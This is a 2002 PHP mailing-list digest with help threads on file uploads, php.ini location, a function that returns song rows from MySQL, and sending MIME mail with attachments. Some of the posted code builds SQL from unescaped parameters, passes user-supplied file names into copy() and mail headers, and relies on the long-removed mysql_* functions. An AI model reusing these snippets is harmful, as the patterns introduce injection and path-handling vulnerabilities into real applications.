> array_pop for this, but I'm sure there's a better way. The problem seems
> to be in writing the file to the web server. I changed the permissions on
> the directories, so I don't think that's the problem. Please help.
Why is it that everyone likes to write their own upload routine? There is a
perfectly good example in the manual that (a) works, (b) shows how it
_should_ be done. Try using that as a starting point and adapt it to your
particular situation.
--
Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
/*
Many people are desperately looking for some wise advice which will
recommend that they do what they want to do.
*/
--- End Message ---
--- Begin Message ---
On Saturday 24 August 2002 16:52, Andy wrote:
> I do have a command line php version installed and I need to switch
> register globals to on for this install. Where do I find this php.ini
> regarding this installation. There is also a web-php installation running
> where I do have a php.ini for. I hope there is a way to seperate those two
> installations.
When you configure/compile php you can specify where you want php to look for
php.ini.
--
Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
/*
Nobody knows what goes between his cold toes and his warm ears.
-- Roy Harper
*/
--- End Message ---
--- Begin Message ---
Hi,
This is the first time I've REALLY tackled multi-dimensional arrays, in
conjunctions with functions.
I like the way this code works:
<?
$sql = "select from....";
$result = mysql_result($sql);
while($myrow = mysql_fetch_array($result))
{
echo $myrow['colname'];
}
?>
So I built a function which returns a multi-dimensional array:
<?
function getSongByArtist($artist_id,$order='title ASC')
{
$sql = "
SELECT *
FROM songs
WHERE artist_id='{$artist_id}'
ORDER BY {$order}
";
$result = mysql_query($sql);
if(!$result)
{
return 0;
}
else
{
while($myrow = mysql_fetch_array($result))
{
foreach($myrow as $k => $v)
{ $$k = $v; }
$songs["$id"] = array(
'title' => "$title",
'writers' => "$writers",
'video' => "$video",
'artist_id' => "$artist_id"
);
}
return $songs;
}
}
?>
I can then do:
<?
$songs = getSongByArtist(4);
print_r($song);
?>
... and it prints the results I'm expecting. All good.
However, I was hoping to use it in a similar way that I use mysql in the
above code... something like:
<?
while($song = getSongByArtist(4))
{
echo song['title'];
echo song['writers'];
echo song['video'];
echo song['artist_id'];
}
?>
But it's just running through an infinite loop. Perhaps mysql_fetch_array()
is doing something magic??? Perhaps I need to return something different in
my function?
I guess I could do it as a foreach()...
Justin French
--- End Message ---
--- Begin Message ---
Everytime you call the function, it re-runs the sql, and gives you the same
list. The only time it wouldn't do that was if the id wasn't found. You
could probably change the function to a class, where the constuctor ran the
sql, and then you had another method to get the next entry.
----- Original Message -----
From: "Justin French" <[EMAIL PROTECTED]>
To: "php" <[EMAIL PROTECTED]>
Sent: Sunday, August 25, 2002 11:12 AM
Subject: [PHP] trouble with function
> Hi,
>
> This is the first time I've REALLY tackled multi-dimensional arrays, in
> conjunctions with functions.
>
> I like the way this code works:
>
> <?
> $sql = "select from....";
> $result = mysql_result($sql);
> while($myrow = mysql_fetch_array($result))
> {
> echo $myrow['colname'];
> }
> ?>
>
> So I built a function which returns a multi-dimensional array:
>
> <?
> function getSongByArtist($artist_id,$order='title ASC')
> {
>
> $sql = "
> SELECT *
> FROM songs
> WHERE artist_id='{$artist_id}'
> ORDER BY {$order}
> ";
> $result = mysql_query($sql);
> if(!$result)
> {
> return 0;
> }
> else
> {
> while($myrow = mysql_fetch_array($result))
> {
> foreach($myrow as $k => $v)
> { $$k = $v; }
>
> $songs["$id"] = array(
> 'title' => "$title",
> 'writers' => "$writers",
> 'video' => "$video",
> 'artist_id' => "$artist_id"
> );
> }
> return $songs;
> }
> }
> ?>
>
> I can then do:
> <?
> $songs = getSongByArtist(4);
> print_r($song);
> ?>
> ... and it prints the results I'm expecting. All good.
>
>
> However, I was hoping to use it in a similar way that I use mysql in the
> above code... something like:
> <?
> while($song = getSongByArtist(4))
> {
> echo song['title'];
> echo song['writers'];
> echo song['video'];
> echo song['artist_id'];
> }
> ?>
>
> But it's just running through an infinite loop. Perhaps
mysql_fetch_array()
> is doing something magic??? Perhaps I need to return something different
in
> my function?
--- End Message ---
--- Begin Message ---
On Mon, 26 Aug 2002 01:12:56 +1000, you wrote:
>However, I was hoping to use it in a similar way that I use mysql in the
>above code... something like:
><?
>while($song = getSongByArtist(4))
> {
> echo song['title'];
> echo song['writers'];
> echo song['video'];
> echo song['artist_id'];
> }
>?>
>
>But it's just running through an infinite loop. Perhaps mysql_fetch_array()
>is doing something magic??? Perhaps I need to return something different in
>my function?
Your function (which I've snipped for space considerations) is
populating a multidimensional array with an entire result set. So if
your artist as 4 songs, you'll get a 2 dimensional array where the
first dimension has 4 elements. (For that reason, your function
really needs to be caled getsongSbyartist, since it gets all the songs
an artist has.) In the code above you want to treat your function as
if it's returning a one dimensional array containing only one row from
the result set.
You're right, you could get the return value from your function, then
use:
$songs = getSongByArtist(4);
foreach($songs as $id => $song) {
echo song['title'];
...
}
But if you really want to use it in a similar fashion to the way
mysql_fetch_array() works, you're going to have to change what your
function returns. You can use a static variable to store the state of
the result set inside your function, and only return one row at a
time. For example:
static $myrow;
if($myrow = mysql_fetch_array($result)) {
foreach($myrow as $k => $v) { $$k = $v; }
$song = array ( 'title' => ...);
return $song;
} else {
return false;
}
That way your function remembers the position of the result set
between calls, and returns one song at a time, until there are no more
left, and then it returns false. I haven't tested the above, but it
should behave the way you expect.
HTH
--- End Message ---
--- Begin Message ---
Fongming schrieb:
> Hi:
>
> the following is my easy way to send MIME mail with a
> attach files. It worked for my own mailing system.
>
> //-----------Make sure if a file upload or not...
>
> if(!empty($my_file))
> {
>
> copy($my_file,"files/$my_file_name");
> $fp=fopen("files/$my_file_name","r");
> //---------------------------------------compose the
> MIME
>
> $version="MIME-Version: 1.0 \n"; //declair the version
> $boundary ="b".md5(uniqid(time())); //make the boundary
> $body_message=$content.$bottom."\n\n--$boundary \n";
> $my_add_file="Content-Type: ".$my_file_type.";\n
> name=\"".$my_file_name."\"\n".
> "Content-Disposition: attachment; \n
> filename=\"$my_file_name\" \n".
> "Content-Transfer-Encoding: base64 \n\n";
> $the_file_content= chunk_split(base64_encode(fread
> ($fp,filesize("files/$my_file_name"))));
> //use base64 method to encode the file.
> $my_add_file .= $the_file_content; //the file
> content added.
>
> //----------------------------------------
> $the_part="Content-Type: multipart/mixed; ".
> "boundary = $boundary \n\n".
> "This is a MIME encoded mesaage. \n\n--
> $boundary\n\n";
> $the_part2="Content-Type: multipart/alternative; ".
> " boundary = $boundary ".
> " \n\n--$boundary";
>
> $mime .="From: ".$main_address."\n";
> $mime .="Cc: ".$other_address."\n";
> $mime .=$version;
> $mime .=$the_part;
> $mime .=$body_message;
> $mime .=$my_add_file;
> $mime .="--$boundary-- \n";
>
> mail($main_address,$title,"",$mime);
> ?>
> <script>
> alert("you succeed to send a MIME mail");
> location.href="list.php";
> </script>
> <? exit;
> }
>
> -----------------------------------------------------
> This mail sent through IMP: http://web.horde.org/imp/
Looks like a have to have a directory with write permissions where
people can upload their files to. Isn't that sort of a security risk?
Olli
--- End Message ---
